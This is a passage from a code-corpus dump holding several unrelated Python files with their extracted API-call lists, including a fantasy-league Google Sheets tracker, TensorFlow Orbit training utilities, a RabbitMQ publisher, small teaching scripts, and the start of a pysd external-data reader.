"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
    Column A holds the week number and each league user has a column from B onward;
    each row is one weekly result, starting with the week number.
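    A purely illustrative layout (user names and scores are hypothetical):
        week | user_a | user_b
           1 |  120.5 |   98.2
           2 |  101.0 |  115.4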
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
            ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
        ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
        ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| [((724, 737), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (735, 737), False, 'from requests_html import HTMLSession\n'), ((1310, 1335), 'browser_cookie3.firefox', 'browser_cookie3.firefox', ([], {}), '()\n', (1333, 1335), False, 'import browser_cookie3\n'), ((4779, 4802), 'pandas.DataFrame', 'pd.DataFrame', (['container'], {}), '(container)\n', (4791, 4802), True, 'import pandas as pd\n'), ((9238, 9269), 'pdsheet.get_app', 'pdsheet.get_app', (['json_secret_fn'], {}), '(json_secret_fn)\n', (9253, 9269), False, 'import pdsheet\n'), ((10047, 10085), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10068, 10085), False, 'import pdsheet\n'), ((10701, 10739), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10722, 10739), False, 'import pdsheet\n'), ((526, 547), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (545, 547), False, 'import logging\n'), ((605, 631), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (614, 631), False, 'import os\n'), ((682, 706), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (691, 706), False, 'import os\n'), ((4496, 4517), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (4515, 4517), False, 'import logging\n'), ((4575, 4601), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (4584, 4601), False, 'import os\n'), ((4652, 4676), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (4661, 4676), False, 'import os\n'), ((9168, 9189), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (9187, 9189), False, 'import logging\n'), ((9311, 9345), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_SPREADSHEET"""'], {}), "('DK_LEAGUE_SPREADSHEET')\n", (9320, 9345), False, 'import os\n'), ((9536, 9569), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['self.sskey'], {}), '(self.sskey)\n', (9557, 9569), False, 'import pdsheet\n'), ((487, 514), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (504, 514), False, 'import logging\n'), ((4457, 4484), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4474, 4484), False, 'import logging\n'), ((9129, 9156), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (9146, 9156), False, 'import logging\n')] |
Wadden12/Semester1 | Graphing/Example1.py | a13c4486848daec3b5865e8a2a778689c81528fe | #!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show() | [((76, 101), 'numpy.arange', 'np.arange', (['(0.0)', '(3.0)', '(0.01)'], {}), '(0.0, 3.0, 0.01)\n', (85, 101), True, 'import numpy as np\n'), ((106, 129), 'numpy.sin', 'np.sin', (['(2.5 * np.pi * t)'], {}), '(2.5 * np.pi * t)\n', (112, 129), True, 'import numpy as np\n'), ((130, 144), 'matplotlib.pyplot.plot', 'plt.plot', (['t', 's'], {}), '(t, s)\n', (138, 144), True, 'import matplotlib.pyplot as plt\n'), ((146, 168), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""time (s)"""'], {}), "('time (s)')\n", (156, 168), True, 'import matplotlib.pyplot as plt\n'), ((169, 195), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""voltage (mV)"""'], {}), "('voltage (mV)')\n", (179, 195), True, 'import matplotlib.pyplot as plt\n'), ((197, 219), 'matplotlib.pyplot.title', 'plt.title', (['"""Sine Wave"""'], {}), "('Sine Wave')\n", (206, 219), True, 'import matplotlib.pyplot as plt\n'), ((220, 234), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (228, 234), True, 'import matplotlib.pyplot as plt\n'), ((236, 246), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (244, 246), True, 'import matplotlib.pyplot as plt\n')] |
gentildf/Python | Cursoemvideo/desafios/desafio008.py | bb333e55b197492eac1294619ca7b13ef57bb631 | #Escreva um programa que leia um valor em metros e o exiba convertido em centimetros e milimetros.
n = float(input('\033[32mDigite o numero:\033[m'))
print('O número digitado é \033[33m{0:.0f}m\033[m.\n'
      'Ele apresentado em centimetros fica \033[33m{1:.2f}cm\033[m.\n'
      'Apresentado em milímetros fica \033[33m{2:.3f}mm\033[m'
      .format(n, n * 100, n * 1000))
#print('O número em metros é {0}.\n
# O número em convertido para centimetros é {1}.\n
# O número convertido para milimetros é {2}'
# .format(n, n/100, n/1000))
| [] |
Dordoloy/BachelorDIM-Lectures-Algorithms-2019 | publish_fanout.py | 14e3e7132eecf62e3476dbea4d9db32adf1544ff | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
    # Parse CLOUDAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
    print("send")
    connection.close()
publish_fanout() | [((262, 303), 'os.environ.get', 'os.environ.get', (['"""CLOUDAMQP_URL"""', 'amqp_url'], {}), "('CLOUDAMQP_URL', amqp_url)\n", (276, 303), False, 'import os\n'), ((316, 339), 'pika.URLParameters', 'pika.URLParameters', (['url'], {}), '(url)\n', (334, 339), False, 'import pika\n'), ((392, 423), 'pika.BlockingConnection', 'pika.BlockingConnection', (['params'], {}), '(params)\n', (415, 423), False, 'import pika\n'), ((469, 491), 'pika.BasicProperties', 'pika.BasicProperties', ([], {}), '()\n', (489, 491), False, 'import pika\n')] |
xjx0524/models | orbit/utils.py | 99be973aa8168a0d2275d475883b3256b193251f | # Lint as: python3
# Copyright 2020 The Orbit Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Some layered modules/functions to help users writing custom training loop."""
import abc
import contextlib
import functools
import inspect
import os
import numpy as np
import tensorflow as tf
def create_loop_fn(step_fn):
"""Creates a multiple steps function driven by the python while loop.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
    A callable defined as the `loop_fn` definition below.
"""
def loop_fn(iterator, num_steps, state=None, reduce_fn=None):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. If `num_steps==-1`, will
        iterate until exhausting the iterator.
state: An optional initial state before running the loop.
reduce_fn: a callable defined as `def reduce_fn(state, value)`, where
`value` is the outputs from `step_fn`.
Returns:
The updated state.
"""
try:
step = 0
# To make sure the OutOfRangeError exception can be handled well with
# async remote eager, we need to wrap the loop body in a `async_scope`.
with tf.experimental.async_scope():
while (num_steps == -1 or step < num_steps):
outputs = step_fn(iterator)
if reduce_fn is not None:
state = reduce_fn(state, outputs)
step += 1
return state
except (StopIteration, tf.errors.OutOfRangeError):
tf.experimental.async_clear_error()
return state
return loop_fn
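# A minimal usage sketch of `create_loop_fn` (illustrative only; `step_fn` and the
# dataset are assumptions, not part of this module):
#
#   def step_fn(iterator):
#     return float(next(iterator))          # one "step" consuming the iterator
#
#   loop_fn = create_loop_fn(step_fn)
#   iterator = iter(tf.data.Dataset.range(10))
#   total = loop_fn(iterator, num_steps=-1, state=0.0,
#                   reduce_fn=lambda state, value: state + value)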
def create_tf_while_loop_fn(step_fn):
"""Create a multiple steps function driven by tf.while_loop on the host.
Args:
step_fn: A function which takes `iterator` as input.
Returns:
    A callable defined as the `loop_fn` definition below.
"""
def loop_fn(iterator, num_steps):
"""A loop function with multiple steps.
Args:
iterator: A nested structure of tf.data `Iterator` or
`DistributedIterator`.
num_steps: The number of steps in the loop. Must be a tf.Tensor.
"""
if not isinstance(num_steps, tf.Tensor):
raise ValueError("`num_steps` should be an `tf.Tensor`. Python object "
"may cause retracing.")
for _ in tf.range(num_steps):
step_fn(iterator)
return loop_fn
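# A minimal sketch (illustrative): `num_steps` must be a tf.Tensor, and the loop
# function is typically wrapped in a `tf.function`:
#
#   tf_loop_fn = tf.function(create_tf_while_loop_fn(step_fn))
#   tf_loop_fn(iterator, tf.constant(100, dtype=tf.int32))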
def create_global_step() -> tf.Variable:
"""Creates a `tf.Variable` suitable for use as a global step counter.
Creating and managing a global step variable may be necessary for
`AbstractTrainer` subclasses that perform multiple parameter updates per
`Controller` "step", or use different optimizers on different steps.
In these cases, an `optimizer.iterations` property generally can't be used
directly, since it would correspond to parameter updates instead of iterations
in the `Controller`'s training loop. Such use cases should simply call
`step.assign_add(1)` at the end of each step.
Returns:
A non-trainable scalar `tf.Variable` of dtype `tf.int64`, with only the
first replica's value retained when synchronizing across replicas in
a distributed setting.
"""
return tf.Variable(
0,
dtype=tf.int64,
trainable=False,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA)
def make_distributed_dataset(strategy, dataset_or_fn, *args, **kwargs):
"""A helper function to create distributed dataset.
Args:
strategy: An instance of `tf.distribute.Strategy`.
dataset_or_fn: A instance of `tf.data.Dataset` or a function which takes an
`tf.distribute.InputContext` as input and returns a `tf.data.Dataset`. If
it is a function, it could optionally have an argument named
`input_context` which is `tf.distribute.InputContext` argument type.
*args: The list of arguments to be passed to dataset_or_fn.
**kwargs: Any keyword arguments to be passed.
Returns:
A distributed Dataset.
"""
if strategy is None:
strategy = tf.distribute.get_strategy()
if isinstance(dataset_or_fn, tf.data.Dataset):
return strategy.experimental_distribute_dataset(dataset_or_fn)
if not callable(dataset_or_fn):
raise ValueError("`dataset_or_fn` should be either callable or an instance "
"of `tf.data.Dataset`")
def dataset_fn(ctx):
"""Wrapped dataset function for creating distributed dataset.."""
# If `dataset_or_fn` is a function and has `input_context` as argument
# names, pass `ctx` as the value of `input_context` when calling
# `dataset_or_fn`. Otherwise `ctx` will not be used when calling
# `dataset_or_fn`.
argspec = inspect.getfullargspec(dataset_or_fn)
args_names = argspec.args
if "input_context" in args_names:
kwargs["input_context"] = ctx
ds = dataset_or_fn(*args, **kwargs)
return ds
return strategy.experimental_distribute_datasets_from_function(dataset_fn)
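# A minimal usage sketch (illustrative; the strategy, batch size and dataset are
# assumptions, not part of this module):
#
#   def dataset_fn(input_context):
#     batch_size = input_context.get_per_replica_batch_size(64)
#     return tf.data.Dataset.range(1000).batch(batch_size)
#
#   strategy = tf.distribute.MirroredStrategy()
#   dist_dataset = make_distributed_dataset(strategy, dataset_fn)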
class SummaryManager:
"""A class manages writing summaries."""
def __init__(self, summary_dir, summary_fn, global_step=None):
"""Construct a summary manager object.
Args:
summary_dir: the directory to write summaries.
summary_fn: A callable defined as `def summary_fn(name, tensor,
step=None)`, which describes the summary operation.
global_step: A `tf.Variable` instance for the global step.
"""
self._enabled = (summary_dir is not None)
self._summary_dir = summary_dir
self._summary_fn = summary_fn
    self._summary_writers = {}
if global_step is None:
self._global_step = tf.summary.experimental.get_step()
else:
self._global_step = global_step
def summary_writer(self, relative_path=""):
"""Returns the underlying summary writer.
Args:
relative_path: The current path in which to write summaries, relative to
the summary directory. By default it is empty, which specifies the root
directory.
"""
if self._summary_writers and relative_path in self._summary_writers:
return self._summary_writers[relative_path]
if self._enabled:
self._summary_writers[relative_path] = tf.summary.create_file_writer(
os.path.join(self._summary_dir, relative_path))
else:
self._summary_writers[relative_path] = tf.summary.create_noop_writer()
return self._summary_writers[relative_path]
def flush(self):
"""Flush the underlying summary writers."""
if self._enabled:
tf.nest.map_structure(tf.summary.flush, self._summary_writers)
def write_summaries(self, summary_dict):
"""Write summaries for the given values.
This recursively creates subdirectories for any nested dictionaries
provided in `summary_dict`, yielding a hierarchy of directories which will
then be reflected in the TensorBoard UI as different colored curves.
E.g. users may evaluate on muliple datasets and return `summary_dict` as a
nested dictionary.
```
{
"dataset": {
"loss": loss,
"accuracy": accuracy
},
"dataset2": {
"loss": loss2,
"accuracy": accuracy2
},
}
```
This will create two subdirectories "dataset" and "dataset2" inside the
summary root directory. Each directory will contain event files including
both "loss" and "accuracy" summaries.
Args:
summary_dict: A dictionary of values. If any value in `summary_dict` is
itself a dictionary, then the function will recursively create
subdirectories with names given by the keys in the dictionary. The
Tensor values are summarized using the summary writer instance specific
to the parent relative path.
"""
if not self._enabled:
return
self._write_summaries(summary_dict)
def _write_summaries(self, summary_dict, relative_path=""):
for name, value in summary_dict.items():
if isinstance(value, dict):
self._write_summaries(
value, relative_path=os.path.join(relative_path, name))
else:
with self.summary_writer(relative_path).as_default():
self._summary_fn(name, value, step=self._global_step)
class Trigger(metaclass=abc.ABCMeta):
"""An abstract class representing a "trigger" for some event."""
@abc.abstractmethod
def __call__(self, value: float, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: Whether the trigger is forced triggered.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
@abc.abstractmethod
def reset(self):
"""Reset states in the trigger."""
class IntervalTrigger(Trigger):
"""Triggers on every fixed interval."""
def __init__(self, interval, start=0):
"""Constructs the IntervalTrigger.
Args:
interval: The triggering interval.
start: An initial value for the trigger.
"""
self._interval = interval
self._last_trigger_value = start
def __call__(self, value, force_trigger=False):
"""Maybe trigger the event based on the given value.
Args:
value: the value for triggering.
force_trigger: If True, the trigger will be forced triggered unless the
last trigger value is equal to `value`.
Returns:
`True` if the trigger is triggered on the given `value`, and
`False` otherwise.
"""
if force_trigger and value != self._last_trigger_value:
self._last_trigger_value = value
return True
if self._interval and self._interval > 0:
if value >= self._last_trigger_value + self._interval:
self._last_trigger_value = value
return True
return False
def reset(self):
"""See base class."""
self._last_trigger_value = 0
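# A small illustrative sketch: with interval=100 and start=0, the trigger fires
# once the observed value has advanced by at least 100 since the last firing.
#
#   trigger = IntervalTrigger(interval=100)
#   trigger(50)    # False
#   trigger(100)   # True  (100 >= 0 + 100)
#   trigger(150)   # False
#   trigger(210)   # True  (210 >= 100 + 100)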
class EpochHelper:
"""A Helper class to handle epochs in Customized Training Loop."""
def __init__(self, epoch_steps, global_step):
"""Constructs the EpochHelper.
Args:
epoch_steps: An integer indicates how many steps in an epoch.
global_step: A `tf.Variable` instance indicates the current global step.
"""
self._epoch_steps = epoch_steps
self._global_step = global_step
self._current_epoch = None
self._epoch_start_step = None
self._in_epoch = False
def epoch_begin(self):
"""Returns whether a new epoch should begin."""
if self._in_epoch:
return False
current_step = self._global_step.numpy()
self._epoch_start_step = current_step
self._current_epoch = current_step // self._epoch_steps
self._in_epoch = True
return True
def epoch_end(self):
"""Returns whether the current epoch should end."""
if not self._in_epoch:
raise ValueError("`epoch_end` can only be called inside an epoch")
current_step = self._global_step.numpy()
epoch = current_step // self._epoch_steps
if epoch > self._current_epoch:
self._in_epoch = False
return True
return False
@property
def batch_index(self):
"""Index of the next batch within the current epoch."""
return self._global_step.numpy() - self._epoch_start_step
@property
def current_epoch(self):
return self._current_epoch
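# A minimal sketch of how EpochHelper is typically driven (illustrative; the
# surrounding training loop is an assumption, not part of this module):
#
#   helper = EpochHelper(epoch_steps=100, global_step=global_step)
#   if helper.epoch_begin():
#     ...                      # per-epoch setup
#   # ... run steps that increment `global_step` ...
#   if helper.epoch_end():
#     ...                      # per-epoch teardown (e.g. write epoch metrics)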
@contextlib.contextmanager
def _soft_device_placement():
"""Context manager for soft device placement, allowing summaries on CPU."""
original_setting = tf.config.get_soft_device_placement()
try:
tf.config.set_soft_device_placement(True)
yield
finally:
tf.config.set_soft_device_placement(original_setting)
def train_function_with_summaries(*args, **kwargs):
"""Utility function to support TPU summaries via multiple `tf.function`s.
This permits interleaving summaries inside TPU-compatible code, but without
any performance impact on steps that do not write summaries.
Usage is as a decorator, similar to `tf.function`, and any `tf.function`
arguments will be passed through if supplied:
@trainer.train_function_with_summaries
def train(self, num_steps):
...
The decorated function is assumed to be a loop method accepting a `num_steps`
parameter, as for instance would be called within the `Controller`'s outer
train loop. The implementation here assumes that `summary_frequency` is
divisible by `steps_per_loop`. The decorated method should accept two
arguments, `self` and `num_steps`.
Two `tf.function` versions of `train_fn` are created: one inside a summary
writer scope with soft device placement enabled (used on steps that require
summary writing), and one with no summary writer present and soft device
placement disabled (used on all other steps).
Args:
*args: Arguments to pass through to `tf.function`.
**kwargs: Keyword arguments to pass through to `tf.function`.
Returns:
If the first argument is a callable, returns the decorated callable.
Otherwise, returns a decorator.
"""
def decorator(train_fn):
# TODO(dhr): Validate the signature of train_fn?
train_fn_with_summaries = tf.function(train_fn, *args, **kwargs)
train_fn_without_summaries = tf.function(train_fn, *args, **kwargs)
@functools.wraps(train_fn)
def wrapper(self, num_steps):
if tf.summary.should_record_summaries():
with _soft_device_placement():
output = train_fn_with_summaries(self, tf.constant(1))
num_steps -= 1
if num_steps >= 1:
with tf.summary.record_if(False):
output = train_fn_without_summaries(self, num_steps)
return output
return wrapper
if args and callable(args[0]):
train_fn, args = args[0], args[1:]
return decorator(train_fn)
return decorator
def get_value(x) -> np.ndarray:
"""Returns the value of a variable/tensor.
Args:
x: input variable.
Returns:
    A Numpy array or number.
"""
if not tf.is_tensor(x):
return x
return x.numpy()
| [] |
whitepeaony/exercism-python | python/word-count/word_count.py | 5c947ba5c589f1969bcb754e88969420262c457e | def count_words(sentence):
sentence = sentence.lower()
words = {}
    separators = ',\n:!&@$%^&._'
    for s in separators:
sentence = sentence.replace(s, ' ')
for w in sentence.split():
if w.endswith('\''):
w = w[:-1]
if w.startswith('\''):
w = w[1:]
words[w] = words.get(w, 0) + 1
return words
| [] |
klauer/apischema | examples/multiple_deserializers.py | 0da9b96b74dabe8704e2dcfca4502aed98500799 | from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shortened to deserializer(Expression), because the class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| [((478, 512), 'apischema.json_schema.deserialization_schema', 'deserialization_schema', (['Expression'], {}), '(Expression)\n', (500, 512), False, 'from apischema.json_schema import deserialization_schema\n'), ((625, 651), 'apischema.deserialize', 'deserialize', (['Expression', '(0)'], {}), '(Expression, 0)\n', (636, 651), False, 'from apischema import deserialize, deserializer\n'), ((655, 687), 'apischema.deserialize', 'deserialize', (['Expression', '"""1 - 1"""'], {}), "(Expression, '1 - 1')\n", (666, 687), False, 'from apischema import deserialize, deserializer\n')] |
txtbits/daw-python | ficheros/CSV/prueba csv (lm)/alumnos.py | 5dde1207e2791e90aa5e9ce2b6afc4116129efab | # -*- coding: utf-8 -*-
'''
Created on 02/12/2011
@author: chra
'''
import csv
from operator import itemgetter
# ----- Function: average grade of the students ----------
def media(alumno):
    # returns the average grade from a dictionary with a student's data
nota1 = int(alumno['Nota1'])
nota2 = int(alumno.get('Nota2'))
nota3 = int(alumno.get('Nota3'))
return (nota1+nota2+nota3) / 3.
# ----------------------------------------------------------
fin = open('alumnos.csv')
lector = csv.DictReader(fin, delimiter=",") # if delimiter is omitted, the comma is used by default // returns a dictionary
# lector = csv.reader(fin, delimiter=",") <-- returns a list
alumnos = []
for linea in lector:
    alumnos.append((linea['Alumno'], media(linea)))
fin.close()
# -------- Sort by student name -----------
alumnos.sort()
print 'Orden por nombre de alumno'
for al in alumnos:
    print "%-10s %6.2f" % al  # 10-character field for the name, 6 digits for the average, 2 of them decimals
# --------------------------------------------------
# --------- Sort by grade -----------------------
print '\nOrden por nota'
alumnos.sort(key=itemgetter(1),reverse=True)
for al in alumnos:
print "%-10s %6.2f" % al
#---------------------------------------------------
# Creates a 'lista_ordenada_notas.csv' file and writes the list sorted by grade
fw = open('lista_ordenada_notas.csv', 'w')
csvwriter = csv.writer(fw)
for al in alumnos:
csvwriter.writerow(al)
fw.close() | [] |
incrementals/b-star | src/interpreter/functions/math/math.py | 325bb51eafd5c5173582bf065b82d10ef9669275 | from src.interpreter.functions.math.add import add
from src.interpreter.functions.math.div import div
from src.interpreter.functions.math.mod import mod
from src.interpreter.functions.math.mul import mul
from src.interpreter.functions.math.pow import pow_func
from src.interpreter.functions.math.sub import sub
def math_func(number, operator: str, by):
operator = operator.strip()
if operator == "+":
return add(number, by)
elif operator == "-":
return sub(number, by)
elif operator == "/":
return div(number, by)
elif operator == "*":
return mul(number, by)
elif operator == "^":
return pow_func(number, by)
elif operator == "%":
return mod(number, by)
else:
raise Exception("unknown operator: " + operator)
| [((426, 441), 'src.interpreter.functions.math.add.add', 'add', (['number', 'by'], {}), '(number, by)\n', (429, 441), False, 'from src.interpreter.functions.math.add import add\n'), ((483, 498), 'src.interpreter.functions.math.sub.sub', 'sub', (['number', 'by'], {}), '(number, by)\n', (486, 498), False, 'from src.interpreter.functions.math.sub import sub\n'), ((540, 555), 'src.interpreter.functions.math.div.div', 'div', (['number', 'by'], {}), '(number, by)\n', (543, 555), False, 'from src.interpreter.functions.math.div import div\n'), ((597, 612), 'src.interpreter.functions.math.mul.mul', 'mul', (['number', 'by'], {}), '(number, by)\n', (600, 612), False, 'from src.interpreter.functions.math.mul import mul\n'), ((654, 674), 'src.interpreter.functions.math.pow.pow_func', 'pow_func', (['number', 'by'], {}), '(number, by)\n', (662, 674), False, 'from src.interpreter.functions.math.pow import pow_func\n'), ((716, 731), 'src.interpreter.functions.math.mod.mod', 'mod', (['number', 'by'], {}), '(number, by)\n', (719, 731), False, 'from src.interpreter.functions.math.mod import mod\n')] |
monkey2000/pygazetteer | setup.py | 3eb6026b1473f773817a81ebc0060ec455482739 | from setuptools import setup
setup(name='pygazetteer',
version='0.1.0',
description='Location extractor by looking up gazetteer',
url='https://github.com/monkey2000/pygazetteer',
license='MIT',
packages=['pygazetteer'],
install_requires=[
'pyahocorasick'
],
zip_safe=False,
include_package_data=True)
| [((30, 318), 'setuptools.setup', 'setup', ([], {'name': '"""pygazetteer"""', 'version': '"""0.1.0"""', 'description': '"""Location extractor by looking up gazetteer"""', 'url': '"""https://github.com/monkey2000/pygazetteer"""', 'license': '"""MIT"""', 'packages': "['pygazetteer']", 'install_requires': "['pyahocorasick']", 'zip_safe': '(False)', 'include_package_data': '(True)'}), "(name='pygazetteer', version='0.1.0', description=\n 'Location extractor by looking up gazetteer', url=\n 'https://github.com/monkey2000/pygazetteer', license='MIT', packages=[\n 'pygazetteer'], install_requires=['pyahocorasick'], zip_safe=False,\n include_package_data=True)\n", (35, 318), False, 'from setuptools import setup\n')] |
mustx1/MYIQ | iqoptionapi/country_id.py | 3afb597aa8a8abc278b7d70dad46af81789eae3e | ID = {"Worldwide":0,
"AF": 1,
"AL": 2,
"DZ": 3,
"AD": 5,
"AO": 6,
"AI": 7,
"AG": 9,
"AR": 10,
"AM": 11,
"AW": 12,
"AT": 14,
"AZ": 15,
"BS": 16,
"BH": 17,
"BD": 18,
"BB": 19,
"BY": 20,
"BZ": 22,
"BJ": 23,
"BM": 24,
"BO": 26,
"BA": 27,
"BW": 28,
"BV": 29,
"BR": 30,
"BN": 31,
"BG": 32,
"BF": 33,
"BI": 34,
"KH": 35,
"CM": 36,
"CV": 38,
"KY": 39,
"TD": 41,
"CL": 42,
"CN": 43,
"CC": 45,
"CO": 46,
"KM": 47,
"CG": 48,
"CK": 49,
"CR": 50,
"CI": 51,
"HR": 52,
"CU": 53,
"CY": 54,
"CZ": 55,
"DK": 56,
"DJ": 57,
"DM": 58,
"DO": 59,
"TL": 60,
"EC": 61,
"EG": 62,
"SV": 63,
"EE": 66,
"ET": 67,
"FO": 69,
"FJ": 70,
"FI": 71,
"FR": 72,
"GF": 73,
"PF": 74,
"GA": 75,
"GM": 76,
"GE": 77,
"DE": 78,
"GH": 79,
"GR": 81,
"GD": 83,
"GP": 84,
"GT": 86,
"GN": 87,
"GY": 88,
"HT": 89,
"HN": 90,
"HK": 91,
"HU": 92,
"IS": 93,
"ID": 94,
"IQ": 95,
"IE": 96,
"IT": 97,
"JM": 98,
"JO": 100,
"KZ": 101,
"KE": 102,
"KI": 103,
"KW": 104,
"KG": 105,
"LA": 106,
"LV": 107,
"LB": 108,
"LS": 109,
"LR": 110,
"LY": 111,
"LT": 113,
"LU": 114,
"MO": 115,
"MK": 116,
"MG": 117,
"MW": 118,
"MY": 119,
"MV": 120,
"ML": 121,
"MT": 122,
"MQ": 124,
"MR": 125,
"MU": 126,
"MX": 128,
"FM": 129,
"MD": 130,
"MC": 131,
"MN": 132,
"MA": 134,
"MZ": 135,
"MM": 136,
"NA": 137,
"NP": 139,
"NL": 140,
"AN": 141,
"NC": 142,
"NZ": 143,
"NI": 144,
"NE": 145,
"NG": 146,
"NO": 149,
"OM": 150,
"PK": 151,
"PW": 152,
"PA": 153,
"PG": 154,
"PY": 155,
"PE": 156,
"PH": 157,
"PL": 159,
"PT": 160,
"QA": 162,
"RE": 163,
"RO": 164,
"RW": 166,
"KN": 167,
"LC": 168,
"SA": 171,
"SN": 172,
"SC": 173,
"SG": 175,
"SK": 176,
"SI": 177,
"SO": 179,
"ZA": 180,
"KR": 181,
"ES": 182,
"LK": 183,
"SH": 184,
"SR": 186,
"SZ": 187,
"SE": 188,
"CH": 189,
"TW": 191,
"TJ": 192,
"TZ": 193,
"TH": 194,
"TG": 195,
"TT": 198,
"TN": 199,
"TR": 200,
"TM": 201,
"UG": 203,
"UA": 204,
"AE": 205,
"GB": 206,
"UY": 207,
"UZ": 208,
"VE": 211,
"VN": 212,
"VG": 213,
"YE": 216,
"ZM": 218,
"ZW": 219,
"RS": 220,
"ME": 221,
"IN": 225,
"TC": 234,
"CD": 235,
"GG": 236,
"IM": 237,
"JE": 239,
"CW": 246, }
| [] |
rogersamso/pysd_dev | pysd/py_backend/external.py | 85606265aa92878c35a41dd81ce9588d23350e19 | """
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
    Class to cache read Excel files and thus avoid reading them twice
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
